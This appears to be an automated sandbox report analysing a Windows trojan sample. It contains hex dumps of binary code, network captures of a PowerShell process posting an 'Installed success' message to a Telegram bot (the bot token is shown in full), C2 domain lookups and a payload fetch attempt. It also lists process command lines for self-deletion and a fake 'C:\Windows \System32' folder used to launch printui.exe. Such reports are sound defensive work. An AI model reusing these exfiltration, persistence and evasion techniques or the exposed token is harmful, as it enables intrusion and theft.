                                                                                                                                                                                                2024-11-05 09:46:32 UTC1378INData Raw: 40 60 48 8b 40 30 48 8b 95 80 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 48 8b 15 ca 23 e7 00 48 8b 85 90 00 00 00 48 89 c1 ff d2 8b 85 9c 01 00 00 48 81 c4 28 02 00 00 5f 5d c3 55 48 89 e5 48 83 ec 30 48 89 4d 10 c7 45 fc 00 00 00 00 48 c7 45 f0 00 00 00 00 48 8b 05 94 23 e7 00 48 8d 55 f0 48 8b 4d 10 49 89 d1 49 89 c8 ba 00 00 00 00 b9 00 00 00 00 ff d0 89 45 fc 83 7d fc 00 78 15 48 8b 15 72 23 e7 00 48 8b 45 f0 48 89 c1 ff d2 8b 45 fc eb 03 8b 45 fc 48 83 c4 30 5d c3 55 48 81 ec 60 02 00 00 48 8d ac 24 80 00 00 00 48 89 8d f0 01 00 00 c7 85 bc 01 00 00 60 00 00 00 8b 85 bc 01 00 00 65 48 8b 00 48 89 85 b0 01 00 00 48 8b 85 b0 01 00 00 48 89 85 c8 01 00 00 48 8b 85 c8 01 00 00 48 8b 40 18 48 89 85 c0 01 00 00 48 8b 85 c0 01 00 00 48 8b 40 20 48
                                                                                                                                                                                                Data Ascii: @`H@0HIHAH#HHH(_]UHH0HMEHEH#HUHMIIE}xHr#HEHEEH0]UH`H$H`eHHHHHH@HHH@ H
                                                                                                                                                                                                2024-11-05 09:46:32 UTC1378INData Raw: 00 4c 8d 05 8a f0 e6 00 ba 10 00 00 00 48 8d 05 1e 2f 00 00 48 89 c1 e8 36 1e 00 00 48 8d 85 90 02 00 00 48 89 c1 e8 14 fb ff ff 48 89 85 c8 02 00 00 48 83 bd c8 02 00 00 00 75 0a b8 ff ff ff ff e9 04 07 00 00 48 c7 85 60 02 00 00 00 00 00 00 48 c7 85 68 02 00 00 00 00 00 00 48 c7 85 70 02 00 00 00 00 00 00 48 c7 85 78 02 00 00 00 00 00 00 48 c7 85 80 02 00 00 00 00 00 00 48 c7 44 24 28 09 00 00 00 48 8d 85 60 02 00 00 48 89 44 24 20 4c 8d 0d 79 f0 e6 00 4c 8d 05 52 f0 e6 00 ba 10 00 00 00 48 8d 05 96 2e 00 00 48 89 c1 e8 9e 1d 00 00 48 8d 85 60 02 00 00 48 89 c1 e8 7c fa ff ff 48 89 85 c0 02 00 00 48 83 bd c0 02 00 00 00 75 0a b8 ff ff ff ff e9 6c 06 00 00 48 c7 85 53 02 00 00 00 00 00 00 48 c7 85 58 02 00 00 00 00 00 00 48 c7 85 47 02 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii: LH/H6HHHHuH`HhHpHxHHD$(H`HD$ LyLRH.HH`H|HHulHSHXHG
                                                                                                                                                                                                2024-11-05 09:46:32 UTC1378INData Raw: 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 30 02 00 00 48 89 50 08 48 8b 15 02 f5 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 10 02 00 00 48 89 50 08 48 8b 15 ba f4 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 08 02 00 00 48 89 50 08 48 8b 15 62 f4 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 f0 01 00 00 48 89 50 08 48 8b 15 5a f4 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 d0 01 00 00 48 89 50 08 48 8b 15 52 f4 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 00 00 00 00 48 8d 95 c0 01 00 00 48 89 50 08 48 c7 40 10 00 00 00 00 48 8d 15 22 18 e7 00 48 89 50 18 48 83 c0 20 c7 00 00 00 00 00 48 8d 95
                                                                                                                                                                                                Data Ascii: H H0HPHHPH@H HHPHHPH@H HHPHbHPH@H HHPHZHPH@H HHPHRHPH@H HHPH@H"HPH H
                                                                                                                                                                                                2024-11-05 09:46:32 UTC1378INData Raw: 91 e6 ff ff 89 85 5c 06 00 00 83 bd 5c 06 00 00 00 78 26 48 8d 85 10 06 00 00 48 89 c1 e8 f6 ef ff ff ba d8 0e 00 00 b9 4c 04 00 00 e8 4d 14 00 00 48 89 c1 e8 a5 14 00 00 48 8d 85 10 06 00 00 48 89 c1 e8 ec e5 ff ff 48 8d 85 00 06 00 00 48 89 c1 e8 dd e5 ff ff eb 01 90 48 81 c4 e8 06 00 00 5f 5d c3 55 48 89 e5 48 89 4d 10 89 55 18 4c 89 45 20 b8 01 00 00 00 5d c3 90 90 90 90 49 89 ca 8b 05 87 db e6 00 0f 05 c3 49 89 ca 8b 05 7f db e6 00 0f 05 c3 49 89 ca 8b 05 77 db e6 00 0f 05 c3 49 89 ca 8b 05 6f db e6 00 0f 05 c3 49 89 ca 8b 05 6b db e6 00 0f 05 c3 49 89 ca 8b 05 5b db e6 00 0f 05 c3 49 89 ca 8b 05 57 db e6 00 0f 05 c3 66 2e 0f 1f 84 00 00 00 00 00 66 90 48 83 ec 28 48 8b 05 45 db e6 00 48 8b 00 48 85 c0 74 22 0f 1f 44 00 00 ff d0 48 8b 05 2f db e6 00
                                                                                                                                                                                                Data Ascii: \\x&HHLMHHHHHH_]UHHMULE ]IIIwIoIkI[IWf.fH(HEHHt"DH/


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                12192.168.2.552803149.154.167.2204433624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:46:55 UTC297OUTPOST /bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage HTTP/1.1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                Content-Length: 94
                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-11-05 09:46:55 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                2024-11-05 09:46:55 UTC94OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 68 61 74 5f 69 64 22 3a 20 20 22 31 35 33 36 31 33 31 34 35 39 22 2c 0d 0a 20 20 20 20 22 74 65 78 74 22 3a 20 20 22 5b 6c 6f 61 64 65 72 5d 20 61 6c 66 6f 6e 73 40 39 36 35 39 36 39 3a 20 49 6e 73 74 61 6c 6c 65 64 20 73 75 63 63 65 73 73 2e 22 0d 0a 7d
                                                                                                                                                                                                Data Ascii: { "chat_id": "1536131459", "text": "[loader] user@965969: Installed success."}
                                                                                                                                                                                                2024-11-05 09:46:55 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:46:55 GMT
                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                Content-Length: 293
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                {"ok":true,"result":{"message_id":2534,"from":{"id":7607027553,"is_bot":true,"first_name":"unvbot","username":"unvbot99bot"},"chat":{"id":1536131459,"first_name":"Panchito","username":"panchitopistolesx","type":"private"},"date":1730800015,"text":"[loader] user@965969: Installed success."}}


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                13192.168.2.55291134.117.59.814431856C:\Windows\System32\svchost.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:47:17 UTC52OUTGET /json HTTP/1.1
                                                                                                                                                                                                Host: ipinfo.io
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:47:17 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                Content-Length: 314
                                                                                                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                                                                                                date: Tue, 05 Nov 2024 09:47:17 GMT
                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                2024-11-05 09:47:17 UTC314INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2e 73 74 61 74 69 63 2e 71 75 61 64 72 61 6e 65 74 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 54 65 78 61 73 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 33 32 2e 38 31 35 32 2c 2d 39 36 2e 38 37 30 33 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 37 35 32 34 37 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72
                                                                                                                                                                                                Data Ascii: { "ip": "173.254.250.76", "hostname": "173.254.250.76.static.quadranet.com", "city": "Dallas", "region": "Texas", "country": "US", "loc": "32.8152,-96.8703", "org": "AS8100 QuadraNet Enterprises LLC", "postal": "75247", "timezone": "Amer


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                14192.168.2.5529278.8.8.84431856C:\Windows\System32\svchost.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:47:36 UTC72OUTGET /resolve?name=unvdwl.com HTTP/1.1
                                                                                                                                                                                                Host: dns.google
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:47:36 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:47:36 GMT
                                                                                                                                                                                                Expires: Tue, 05 Nov 2024 09:47:36 GMT
                                                                                                                                                                                                Cache-Control: private, max-age=10800
                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                Server: HTTP server (unknown)
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                2024-11-05 09:47:36 UTC236INData Raw: 65 36 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 75 6e 76 64 77 6c 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 75 6e 76 64 77 6c 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 31 30 38 30 30 2c 22 64 61 74 61 22 3a 22 31 39 34 2e 32 36 2e 31 39 32 2e 35 32 22 7d 5d 2c 22 43 6f 6d 6d 65 6e 74 22 3a 22 52 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 31 38 35 2e 31 39 33 2e 31 32 34 2e 33 34 2e 22 7d 0d 0a
                                                                                                                                                                                                Data Ascii: e6{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"unvdwl.com.","type":1}],"Answer":[{"name":"unvdwl.com.","type":1,"TTL":10800,"data":"194.26.192.52"}],"Comment":"Response from 185.193.124.34."}
                                                                                                                                                                                                2024-11-05 09:47:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                15192.168.2.5529388.8.8.84431856C:\Windows\System32\svchost.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:47:53 UTC76OUTGET /resolve?name=rootunvdwl.com HTTP/1.1
                                                                                                                                                                                                Host: dns.google
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:47:53 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:47:53 GMT
                                                                                                                                                                                                Expires: Tue, 05 Nov 2024 09:47:53 GMT
                                                                                                                                                                                                Cache-Control: private, max-age=1800
                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                Server: HTTP server (unknown)
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                2024-11-05 09:47:53 UTC306INData Raw: 31 32 62 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 72 6f 6f 74 75 6e 76 64 77 6c 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 75 74 68 6f 72 69 74 79 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 72 6f 6f 74 75 6e 76 64 77 6c 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 36 2c 22 54 54 4c 22 3a 31 38 30 30 2c 22 64 61 74 61 22 3a 22 31 2d 79 6f 75 2e 6e 6a 61 6c 6c 61 2e 6e 6f 2e 20 79 6f 75 2e 63 61 6e 2d 67 65 74 2d 6e 6f 2e 69 6e 66 6f 2e 20 32 30 32 34 30 39 32 37 30 38 20 32 31 36 30 30 20 37 32 30 30 20 31 38 31 34 34 30 30 20 33
                                                                                                                                                                                                Data Ascii: 12b{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"rootunvdwl.com.","type":1}],"Authority":[{"name":"rootunvdwl.com.","type":6,"TTL":1800,"data":"1-you.njalla.no. you.can-get-no.info. 2024092708 21600 7200 1814400 3
                                                                                                                                                                                                2024-11-05 09:47:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                16192.168.2.552944140.82.121.34431856C:\Windows\System32\svchost.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:48:00 UTC89OUTHEAD /unvdwl/dwl/raw/main/ubotrestorehard.dat HTTP/1.1
                                                                                                                                                                                                Host: github.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:48:00 UTC442INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:48:00 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                2024-11-05 09:48:00 UTC3363INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                Statistics

                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Behavior

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:04:45:58
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe"
                                                                                                                                                                                                Imagebase:0x7ff745000000
                                                                                                                                                                                                File size:1'694'720 bytes
                                                                                                                                                                                                MD5 hash:D4E3A11D9468375F793C4C5C2504A374
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                Start time:04:45:58
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c start "" "C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                Start time:04:45:58
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                Start time:04:45:58
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                Start time:04:45:58
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                Start time:04:45:58
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                                                                                                Imagebase:0x7ff6cf970000
                                                                                                                                                                                                File size:614'912 bytes
                                                                                                                                                                                                MD5 hash:F9830DF1DFDB31CEC5E3BD9F892EDC9A
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 34%, ReversingLabs
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:04:45:58
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:timeout /t 10 /nobreak
                                                                                                                                                                                                Imagebase:0x7ff6c9000000
                                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                Start time:04:46:11
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                                                                                                Imagebase:0x7ff6cf970000
                                                                                                                                                                                                File size:614'912 bytes
                                                                                                                                                                                                MD5 hash:F9830DF1DFDB31CEC5E3BD9F892EDC9A
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                Start time:04:46:13
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c mkdir "\\?\C:\Windows \System32"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                Start time:04:46:13
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                Start time:04:46:13
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c start "" "C:\Windows \System32\printui.exe"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                Start time:04:46:13
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                Start time:04:46:13
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows \System32\printui.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows \System32\printui.exe"
                                                                                                                                                                                                Imagebase:0x7ff7bac80000
                                                                                                                                                                                                File size:64'000 bytes
                                                                                                                                                                                                MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
